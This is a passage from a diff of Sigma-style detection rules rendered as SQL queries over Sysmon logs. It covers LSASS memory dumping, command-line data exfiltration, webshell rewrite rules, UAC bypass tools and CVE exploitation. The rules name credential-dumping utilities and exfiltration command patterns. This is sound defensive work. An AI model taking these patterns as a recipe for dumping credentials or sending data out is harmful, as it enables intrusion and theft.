= '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", + "status": "experimental", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on custom use of vsls-agent.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", + "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "status": "experimental", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Valid user connecting using RDP" + "Legitimate usage of appcmd to add new URL rewrite rules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. John, OTR (Open Threat Research)", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "status": "experimental", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_wmic_recon_service.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE 